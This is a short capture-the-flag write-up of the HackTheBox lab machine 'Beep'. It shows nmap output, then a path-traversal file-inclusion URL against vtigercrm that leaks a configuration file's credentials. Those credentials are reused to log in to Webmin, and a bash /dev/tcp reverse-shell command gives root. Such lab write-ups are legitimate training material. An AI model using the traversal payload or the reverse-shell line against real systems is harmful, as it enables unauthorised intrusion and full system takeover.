HackTheBox - Beep
Starting with a basic nmap scan
nmap -sC -sV 10.10.10.7
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE APOP UIDL IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING LOGIN-DELAY(0) RESP-CODES EXPIRE(NEVER) USER TOP STLS
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed X-NETSCAPE RENAME IMAP4 OK LIST-SUBSCRIBED LITERAL+ NO IDLE ATOMIC SORT CHILDREN URLAUTHA0001 CONDSTORE CATENATE ANNOTATEMORE THREAD=REFERENCES UNSELECT UIDPLUS IMAP4rev1 THREAD=ORDEREDSUBJECT SORT=MODSEQ ACL BINARY ID MULTIAPPEND STARTTLS MAILBOX-REFERRALS QUOTA RIGHTS=kxte LISTEXT NAMESPACE
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_ssl-date: 2021-05-23T06:54:49+00:00; +1m54s from scanner time.
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Host script results:
|_clock-skew: 1m53s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 463.69 seconds
We find that the port 80 is open and a application called elastix is running on it
Running dirbuster on http://10.10.10.7 we get
We also have http server running on the port 10000
We have some exploits related to elastix
Using http://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
we get
By using the
username : admin
password : jEhdIekWmdjE
But there is nothing that we can do
Trying the same password in the http://10.10.10.7:10000
Using the
Username : root
Password : jEhdIekWmdjE
In the options there is a option 'Others' which has command shell using which we can run arbitrary commands on the system as root
By running bash -i >& /dev/tcp/10.10.16.200/1222 0>&1 we get a reverse shell as the root user
We get both the user.txt and the root.txt flags
